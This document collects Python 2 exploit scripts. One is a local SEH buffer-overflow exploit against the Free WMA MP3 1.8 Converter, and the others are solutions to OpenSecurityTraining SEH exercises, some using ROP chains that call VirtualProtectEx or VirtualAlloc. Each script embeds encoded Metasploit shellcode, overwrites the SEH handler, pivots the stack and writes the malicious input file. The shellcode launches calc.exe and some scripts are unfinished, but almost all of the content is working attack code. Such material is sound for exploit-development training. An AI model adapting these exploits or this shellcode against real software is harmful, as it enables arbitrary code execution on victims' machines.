[Open Security Training Challenges (SEH)]


[Exploit for WMA MP3 1.8 Converter]

!/usr/bin/env python
# NOTE(review): the shebang above lost its leading '#' (most likely in rendering);
# as written the first line is a syntax error.
# Exploit Title: Free WMA MP3 1.8 Converter (.wav) - Local Buffer Overflow Exploit (SEH)
# Date: 20/11/2014
# Author: headshoot
# Contact: deadbea7@fake.mx
# Software: 
# Tested on WinXP SP3
#
# Builds a 5000-byte buffer (thestring) and, when run as a script, writes it to fileName.
# Python 2 script: the "\x.." literals are byte strings there. On Python 3 they are text,
# so bytearray(thestring) at the bottom raises TypeError (an encoding is required);
# keep it on Python 2 or turn every literal into b"...".

import struct

thestring = "\x90" * (104+44)   # 148 bytes of 0x90 padding
# ===============================================================
# $ sudo msfpayload windows/exec CMD=calc.exe R|msfencode  -e x86/nonalpha -t py  
# [*] x86/nonalpha succeeded with size 287 (iteration=1)
# ===============================================================
thestring += (
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
"\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
"\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
"\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
"\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
"\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
"\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
"\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
"\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
"\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
"\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
"\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
"\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
"\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
"\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
"\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
"\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
"\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
"\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
"\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
"\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
"\x00") 
thestring += "\xCC" * (4116-435) # 3681 bytes of 0xCC filler; an earlier revision used (4116-144)
thestring += "\xeb\x06\x90\x90" # next SE override 
thestring += struct.pack("<L", 0x00401474) # SE Handler override
thestring += "\x90"*4
thestring += "\x81\xC4\x70\x04\x00\x00" # ADD ESP, 400 -- NOTE(review): the encoded imm32 is 0x470, not 400
thestring += "\xFF\xE4\x90\x90"
thestring += "\xCC" * (5000-len(thestring)) # pad to exactly 5000 bytes to make the exploit more reliable

if __name__ == '__main__':

        fileName='C:\exploit_apps\Free WMA MP3 Converter\\freewma_poc.wav'
        # NOTE(review): not a raw string; the single backslashes only survive because
        # '\e' and '\F' are not escape sequences in Python. Prefer r'...' for Windows paths.

        with open(fileName, 'wb') as fb:
                fb.write(bytearray(thestring))
        fb.close()   # redundant: the with-block already closed fb (close() on a closed file is a no-op)

[Different Solutions for SEH_HARDENED and SEH_SIMPLE]

These are different solutions to the training exercises from openSecuritytraining.info

[SEH hardened call to Valloc]

##!/usr/bin/python
# NOTE(review): the doubled '#' makes the line above a plain comment, not a shebang.
# -*- coding: cp1252 -*-
# Author:: Dirk
# Date: 10.11.2014
# Function: Exploit for seh_overflow_hardened
# Application: seh_harded from http://opensecuritytraining.info/Exploits2.html
# ============================= Mona setup for badchars =====================
# !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
# !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
#
# Builds a 1200-byte buffer (mystring). This listing only assembles the buffer:
# fileName is assigned at the end, but nothing is written to it here.
# Python 2 script: b"..." and "..." literals are the same type there. On Python 3 the
# first `mystring += "..."` raises TypeError (bytes + str).
import struct



mystring = b"\x90"*100                          # Padding
# ======================================================================
# windows/exec
# CMD=calc.exe
# msfpayload windows/exec CMD=calc.exe R| \
# =========================== Stripped badchars payload ================
# msfencode -e x86/nonalpha -b \
# '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
# [*] x86/nonalpha succeeded with size 287 (iteration=1)
# ======================================================================
mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
"\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
"\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
"\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
"\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
"\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
"\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
"\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
"\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
"\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
"\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
"\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
"\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
"\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
"\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
"\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
"\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
"\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
"\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
"\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
"\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
"\x00")

###################### [ ROP Chain ] ####
mystring+=b"\x90"* (645-60)                             # Garbage (585 bytes)
mystring+=struct.pack("<L", 0x7c809AE1) # Location after stack pivot (call to VirtualAlloc)
mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
mystring+=struct.pack("<L", 0x00000001) # dwSize
mystring+=struct.pack("<L", 0x00001000) # DWORD flAllocationType MEM_COMMIT 0x00001000
mystring+=struct.pack("<L", 0x00000040) # flProtect
################## [ Stackpivot start ] #
mystring+=b"\xCC"*96                                    # compensate
mystring+="\x90"*4                                              # Next SEH
mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
mystring+=b"\xCC"*(1200-len(mystring))                  # pad to exactly 1200 bytes
fileName='C:\seh_overflow.bin'   # assigned but never opened in this listing

[SEH exploit with vprotect]

#!/usr/bin/python
# -*- coding: cp1252 -*-
# !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
# !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
#
# Builds a 1200-byte buffer (mystring) and writes it to fileName.
# Python 2 script: b"..." and "..." literals are the same type there. On Python 3 the
# first `mystring += "..."` raises TypeError (bytes + str).


import struct
mystring = b"\x90"*100 # Padding

# ======================================================================
# windows/exec
# CMD=calc.exe
# msfpayload windows/exec CMD=calc.exe R|msfencode -e x86/nonalpha -b '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
# [*] x86/nonalpha succeeded with size 287 (iteration=1)
# ======================================================================
mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
"\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
"\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
"\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
"\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
"\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
"\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
"\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
"\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
"\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
"\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
"\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
"\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
"\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
"\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
"\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
"\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
"\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
"\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
"\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
"\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
"\x00")

################## [ ROP Start ] ###### #
mystring+=b"\x90"* (645-60)             # Garbage (585 bytes)
#mystring+=struct.pack("<L", 0x10051281)
# 0x10097784 :  # PUSH ESP # POP ESI # POP ECX # RETN    ** [Flash6.ocx] **   | Gadget to save esp
mystring+=struct.pack("<L", 0x7c801ad4) # Location after stack pivot (call to VirtualProtectEx)
mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
mystring+=struct.pack("<L", 0x00000122) # (Size - Shellcode length) (dwSize)
mystring+=struct.pack("<L", 0x00000040) # Specifies the new protection Mode == 
mystring+=struct.pack("<L", 0x0013fb80) # Pointer to a writeable address (lpOldProtect) 0x1003c898
################## [ Stackpivot start ] #
mystring+=b"\xCC"*96                                    # compensate
mystring+="\x90"*4                                              # Next SEH
mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
mystring+=b"\xCC"*(1200-len(mystring))                  # pad to exactly 1200 bytes

fileName='C:\seh_overflow.bin'   # NOTE(review): not a raw string; works only because '\s' is not an escape sequence

with open(fileName, 'wb') as fb:
    fb.write(bytearray(mystring))
fb.close()   # redundant: the with-block already closed fb (close() on a closed file is a no-op)


[SEH exploit with call to WIP]

#!/usr/bin/python
# -*- coding: cp1252 -*-
# !mona compare -f C:\logs\seh_overflow\bytearray.bin -a 0012fbd0
# !mona bytearray -n -cpb '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10'
#
# Work in progress: builds a 1200-byte buffer (mystring). This listing only assembles the
# buffer; fileName is assigned at the end, but nothing is written to it here.
# Python 2 script: b"..." and "..." literals are the same type there. On Python 3 the
# first `mystring += "..."` raises TypeError (bytes + str).


import struct
mystring = b"\x90"*100 # Padding

# ======================================================================
# windows/exec
# CMD=calc.exe
# msfpayload windows/exec CMD=calc.exe R|msfencode -e x86/nonalpha -b '\x00\x0a\x0b\x0c\x0d\x0e\x0f\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10' -t py 
# [*] x86/nonalpha succeeded with size 287 (iteration=1)
# ======================================================================
mystring+=("\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x33\x8b"
"\xd7\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28"
"\x07\xeb\xf1\xeb\x38\xe8\xe2\xff\xff\xff\x17\x29\x29"
"\x29\x09\x31\x1a\x29\x24\x29\x39\x03\x07\x31\x2b\x33"
"\x23\x32\x06\x06\x23\x23\x15\x30\x23\x37\x1a\x22\x21"
"\x2a\x23\x21\x11\x2b\x13\x0c\x25\x13\x06\x34\x09\x0c"
"\x11\x28\x18\x1a\x0f\x18\x16\x03\x16\xfc\xe8\x89\x00"
"\x00\x00\x60\x89\xe5\x31\xd2\x7b\x8b\x7b\x30\x8b\x7b"
"\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7\x7b\x26\x31\xff"
"\x31\xc0\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
"\xc7\xe2\xf0\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x01\xd0"
"\x8b\x40\x7b\x85\xc0\x7b\x7b\x01\xd0\x7b\x8b\x7b\x18"
"\x8b\x7b\x20\x01\xd3\xe3\x3c\x7b\x8b\x34\x8b\x01\xd6"
"\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x7b"
"\xf4\x03\x7d\xf8\x3b\x7d\x24\x7b\xe2\x7b\x8b\x7b\x24"
"\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c\x01\xd3\x8b\x04"
"\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b\x7b\x7b\x7b"
"\xff\xe0\x7b\x5f\x7b\x8b\x12\xeb\x86\x5d\x7b\x01\x8d"
"\x85\xb9\x00\x00\x00\x7b\x7b\x31\x8b\x7b\x87\xff\xd5"
"\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd\x9d\xff\xd5\x3c"
"\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b\x13\x7b\x7b"
"\x7b\x00\x7b\xff\xd5\x7b\x7b\x7b\x7b\x2e\x7b\x7b\x7b"
"\x00")

################## [ ROP Start ] ###### #
mystring+=b"\x90"* 585                                  # Garbage
mystring+=struct.pack("<L", 0x1008e997) # ADD ESP,20 # RETN
mystring+=struct.pack("<L", 0x7c801ad4) # Location after stack pivot (call to VirtualProtectEx)
mystring+="AAAA"   # placeholder dword (WIP)
mystring+="XXXX"   # placeholder dword (WIP)
mystring+="YYYY"   # placeholder dword (WIP)
#mystring+="ZZZZ"
#mystring+=struct.pack("<L", 0x0013fbd0) # Return address from VProtectEx # 0012fbd0
#mystring+=struct.pack("<L", 0x0013fbd0) # Baseaddress of the Shellcode (lpAddress)
#mystring+=struct.pack("<L", 0x00000122)        # (Size - Shellcode length) (dwSize)
#mystring+=struct.pack("<L", 0x00000040) # Specifies the new protection Mode == 
#mystring+=struct.pack("<L", 0x0013fb80)        # Pointer to a writeable address (lpOldProtect) 0x1003c898
################## [ Stackpivot start ] #
mystring+=b"\xCC"*(100)                                 # compensate
mystring+="\x90"*4                                              # Next SEH
mystring+= struct.pack("<L", 0x10086d6a ) # SE Handler "add esp, 0x878, ret"
mystring+=b"\xCC"*(1200-len(mystring))                  # pad to exactly 1200 bytes

fileName='C:\seh_overflow.bin'   # assigned but never opened in this listing


[Simple SEH overflow]

#!/usr/bin/python
#
# Builds a buffer (mystring) and writes it to fileName.
# Python 2 script: b"..." and "..." literals are the same type there. On Python 3 the
# first `mystring += "..."` raises TypeError (bytes + str).

import struct

mystring=b"\xCC"*100
# ======================================================================
# windows/exec - 200 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependMigrate=false, EXITFUNC=seh, 
# CMD=calc.exe
# [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
# ======================================================================
mystring +=("\xdb\xcd\xd9\x74\x24\xf4\xbd\xa1\x17\xfb\x07\x58\x29"
"\xc9\xb1\x33\x83\xc0\x04\x31\x68\x13\x03\xc9\x04\x19"
"\xf2\xf5\xc3\x54\xfd\x05\x14\x07\x77\xe0\x25\x15\xe3"
"\x61\x17\xa9\x67\x27\x94\x42\x25\xd3\x2f\x26\xe2\xd4"
"\x98\x8d\xd4\xdb\x19\x20\xd9\xb7\xda\x22\xa5\xc5\x0e"
"\x85\x94\x06\x43\xc4\xd1\x7a\xac\x94\x8a\xf1\x1f\x09"
"\xbe\x47\x9c\x28\x10\xcc\x9c\x52\x15\x12\x68\xe9\x14"
"\x42\xc1\x66\x5e\x7a\x69\x20\x7f\x7b\xbe\x32\x43\x32"
"\xcb\x81\x37\xc5\x1d\xd8\xb8\xf4\x61\xb7\x86\x39\x6c"
"\xc9\xcf\xfd\x8f\xbc\x3b\xfe\x32\xc7\xff\x7d\xe9\x42"
"\xe2\x25\x7a\xf4\xc6\xd4\xaf\x63\x8c\xda\x04\xe7\xca"
"\xfe\x9b\x24\x61\xfa\x10\xcb\xa6\x8b\x63\xe8\x62\xd0"
"\x30\x91\x33\xbc\x97\xae\x24\x18\x47\x0b\x2e\x8a\x9c"
"\x2d\x6d\xc0\x63\xbf\x0b\xad\x64\xbf\x13\x9d\x0c\x8e"
"\x98\x72\x4a\x0f\x4b\x37\xaa\xfe\x46\xad\x3b\x59\x33"
"\x8c\x21\x5a\xe9\xd2\x5f\xd9\x18\xaa\x9b\xc1\x68\xaf"
"\xe0\x45\x80\xdd\x79\x20\xa6\x72\x79\x61\xc5\x15\xe9"
"\xe9\x24\xb0\x89\x88\x38")
mystring+=b"\xCC"* (765)# leftover from an earlier size: +327)
mystring+=b"\xeb\x06\x90\x90" # next SE Handler 
mystring+= struct.pack("<L", 0x00401106) # SE Handler
mystring+=b"\x90"*4
mystring+= "\xB9\xD0\xFB\x12\x00" #== mov ecx, 0x0012fbd0 "address of prize" -- NOTE(review): the original comment said 0x401000, but the little-endian imm32 D0 FB 12 00 encodes 0x0012fbd0
mystring+= "\xFF\xE1\x90\x90"
mystring+=b"\xCC"*16
#mystring+=b"\x90"*(1500-len(mystring))

fileName='C:\seh_overflow.bin'   # NOTE(review): not a raw string; works only because '\s' is not an escape sequence

with open(fileName, 'wb') as fb:
    fb.write(bytearray(mystring))
fb.close()   # redundant: the with-block already closed fb (close() on a closed file is a no-op)

